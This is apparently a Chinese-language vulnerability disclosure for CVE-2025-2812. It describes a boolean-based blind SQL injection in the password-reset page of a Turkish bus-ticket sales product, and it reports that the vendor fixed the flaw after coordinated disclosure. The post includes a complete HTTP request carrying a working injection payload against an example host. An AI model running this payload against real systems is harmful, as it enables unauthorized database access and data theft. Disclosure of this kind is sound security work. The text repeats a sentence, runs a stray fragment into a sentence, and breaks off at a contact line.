📌 CVE-ID: CVE-2025-2812
📢 USOM 公告: tr-25-0099
🛡️ 漏洞类型: CWE-89 - SQL 注入(基于布尔值的盲注)
🏢 受影响产品: Bilet Satış Otomasyonu – Mydata Bilişim Ltd. Şti
🌐 示例目标 URL:https://otobusfirmasi.com.tr/otobus-bileti/SifremiUnuttum.php
在“Bilet Satış Otomasyonu”产品中,密码重置页面(SifremiUnuttum.php)上的 "Adınızın ilk harfi"(ilkHarf)参数中发现了基于布尔值的盲 SQL 注入漏洞。此漏洞允许在无需用户名或密码的情况下从系统中窃取数据。
该漏洞涉及以下巴士公司的系统:
GET /otobus-bileti/SifremiUnuttumBilgi.php?TelefonNo=12313131231312313&ilkHarf=a')%20OR%20NOT%20LENGTH(LENGTH((SELECT%20SCHEMA_NAME%20FROM(INFORMATION_SCHEMA.SCHEMATA)LIMIT%200,1)))=1--%20wXyW HTTP/1.1
Host: otobusfirmasi.com.tr
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: https://otobusfirmasi.com.tr/otobus-bileti/SifremiUnuttum.php
Cookie: PHPSESSID=***************
TelefonNo=12313131231312313&ilkHarf=a')%20OR%20NOT%20LENGTH(LENGTH((SELECT%20SCHEMA_NAME%20FROM(INFORMATION_SCHEMA.SCHEMATA)LIMIT%200,1)))=1--%20wXyW
ilkHarf我们在由“Mydata Bilişim Ltd. Şti”开发的“Bilet Satış Otomasyonu”产品中发现漏洞后,以 CVE-2025-2812 代码发布的此漏洞已通过厂商与 USOM 的协调予以公布。 我们很自豪能够在此过程中为网络安全社区做出贡献。
在漏洞报告之后,Mydata Bilişim Ltd. Şti 迅速执行了所有必要流程,关闭了相关安全漏洞并为其系统集成了额外的安全措施。我们对他们在过程中表现出的透明度、合作意识与责任感表示衷心感谢。
我们很自豪能够在此过程中为网络安全社区做出贡献。
如有任何疑问、反馈或合作需求,请通过以下方式与我联系: